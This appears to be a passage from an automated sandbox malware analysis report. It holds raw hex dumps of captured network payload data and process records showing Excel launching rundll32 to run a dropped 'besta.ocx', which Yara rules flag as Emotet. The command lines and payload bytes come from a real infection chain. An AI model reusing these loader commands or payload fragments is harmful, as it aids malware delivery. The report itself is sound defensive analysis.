                                                                                                                      Data Ascii: 1y(=4l|u.WwOrBA/JPeTaNKLHS\tb._O"!N SMymEX!A1X`B_=)(Bl|!?Zg@A]=w:xnww,GX$5 \6o_1@!,OTymVl=Sl(55hX}`H_9rC4gP5(
                                                                                                                      2021-12-02 08:40:06 UTC416INData Raw: 18 c6 80 bd a9 5c 5c 5a 43 8d 0b 68 9c 13 5f 03 d2 29 03 8c aa af 3d f1 2e 55 3e 99 a1 6c 38 fa c8 44 78 1f f6 30 5e be ef 6c 74 61 0f 4f 0d 2e 9c 5f fc 11 28 29 09 84 e6 91 b3 94 9e 22 21 42 45 db 14 f0 9b b0 f1 49 45 88 2a 79 6d e5 92 6c 53 c5 8c ea 15 86 a6 be 28 a8 cd 05 b7 69 f2 50 58 d6 98 95 c4 64 88 0e 5f 31 b4 0e 10 a3 d5 fb dc 16 62 c9 1a 44 48 5b 58 c7 ab 41 e9 4c 7c cd 9b b0 f9 da 6d 3e 58 79 6d f9 17 b4 92 c5 8c da 09 fa 08 ea c6 e8 e5 19 19 44 78 7f 19 05 89 a3 ef 6c 40 0b ca fb 0d 2e 9c 6b 6f cb d7 d6 09 8c d2 6f 1f 50 26 22 21 76 1a d1 b5 c9 dd 80 e1 12 5f d2 54 35 6d c5 d6 3e ec 4c 48 43 58 d6 b8 63 db 70 27 48 5f 29 d1 5c d9 a3 d5 cb c4 89 ef 91 b5 02 48 5f 06 14 4f be a9 6c 78 97 46 c5 0d 2e ac 53 ae e1 5b 25 09 bc ea b5 af 46 d2 22 21
                                                                                                                      Data Ascii: \\ZCh_)=.U>l8Dx0^ltaO._()"!BEIE*ymlS(iPXd_1bDH[XAL|m>XymDxl@.kooP&"!v_T5m>LHCXcp'H_)\H_OlxF.S[%F"!
                                                                                                                      2021-12-02 08:40:06 UTC432INData Raw: 7a 21 60 7b ee 3b f2 2c 1d af df 61 c1 4d 77 36 e5 4e 99 8b 69 a3 54 be a3 65 ac d5 72 fd 1a af c9 4b 99 b6 28 29 03 5d 3e 49 0d af d9 28 a4 35 a4 0d 6c c9 1a c5 ca ab fd 6b 41 be 38 c1 39 c1 1a c5 f2 1b fd 8f 55 be 28 a2 70 42 d4 3a 79 8b 8d 2e d0 9a 78 28 88 c9 e5 71 29 ab d8 a3 54 e9 78 d6 3c ed 42 c4 0d af 52 37 70 5a 28 29 88 21 93 55 f3 50 52 6b ef e5 d7 82 8b 42 9e e1 a1 af d9 a3 6f 76 7e d6 fc ed 5e 4e 99 8b 05 a3 54 be 90 9c c5 07 15 4e 81 8b fd a2 54 be 27 6d 50 21 73 e9 f2 50 8e 5c e0 9a a4 29 88 c9 91 51 29 6b d9 a3 54 35 a4 0d 8c c8 1a c5 e5 e1 f5 5c ab 3d ec 05 37 0a 02 d3 02 11 77 56 b7 b6 c1 da 8a c9 1a 4e 99 8b e5 a2 54 be a3 65 ac e5 72 dd 1b af c9 4b 59 b6 28 29 77 7d 3e 8d 0c af d9 28 a4 33 ac 0d d8 c8 1a c5 f2 1b fd 0b 54 be 28 d6 3c
                                                                                                                      Data Ascii: z!`{;,aMw6NiTerK()]>I(5lkA89U(pB:y.x(q)Tx<BR7pZ()!UPRkBov~^NTNT'mP!sP\)Q)kT5\=7wVNTerKY()w}>(3T(<
                                                                                                                      2021-12-02 08:40:06 UTC448INData Raw: 11 fb 4b 91 49 9d e2 80 28 e9 89 c9 0e c5 0d af b5 92 01 85 ab 12 24 f2 17 fa 0d af d9 73 55 be 24 29 88 c9 f9 f6 a2 9b d9 43 55 be 3c 29 88 c9 91 f5 55 9e e2 91 62 8a 40 1d e7 fd 1a 35 0c af d5 a3 54 be ca 1a 19 fd 1a c5 0f af fd a3 54 be b7 18 3a f8 cd f4 f0 9e c0 91 e9 8c df 1b c3 fa 8c f6 a0 9c 1c 90 6d 8a 7d 1d df f5 1a d5 0f af cd a3 54 be f9 1f 62 ff ad fd f7 95 6f 9c 54 be 28 09 8a c9 16 c5 0d af ca 92 ce 81 28 29 88 c9 1a c5 0d af d9 a3 54 be 28 29 88 c9 1a c5 0d af d9 a3 54 be 28 29 88 c9 1a c5 0d af d9 a3 54 be 28 29 88 c9 1a c5 0d af d9 a3 54 be 28 29 88 c9 1a c5 0d af d9 a3 54 be 28 29 88 c9 1a c5 0d af d9 a3 54 be 28 29 88 c9 1a c5 0d af d9 a3 54 be 28 29 88 c9 1a c5 0d af d9 a3 54 be 28 29 88 c9 1a c5 0d af d9 a3 54 be 28 29 88 c9 1a c5 0d
                                                                                                                      Data Ascii: KI($sU$)CU<)Ub@5TT:m}TboT(()T()T()T()T()T()T()T()T()T()


                                                                                                                      Code Manipulations

                                                                                                                      Statistics

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Start time:09:39:15
                                                                                                                      Start date:02/12/2021
                                                                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                      Imagebase:0x13fcc0000
                                                                                                                      File size:28253536 bytes
                                                                                                                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Start time:09:39:20
                                                                                                                      Start date:02/12/2021
                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4022966435
                                                                                                                      Imagebase:0xa50000
                                                                                                                      File size:44544 bytes
                                                                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.588333443.00000000002F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.588398345.000000000041D000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                      Reputation:high

                                                                                                                      General

                                                                                                                      Start time:09:40:42
                                                                                                                      Start date:02/12/2021
                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",Control_RunDLL
                                                                                                                      Imagebase:0xa50000
                                                                                                                      File size:44544 bytes
                                                                                                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.740442546.000000000046D000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                      Reputation:high

                                                                                                                      Disassembly

                                                                                                                      Code Analysis

                                                                                                                      Reset < >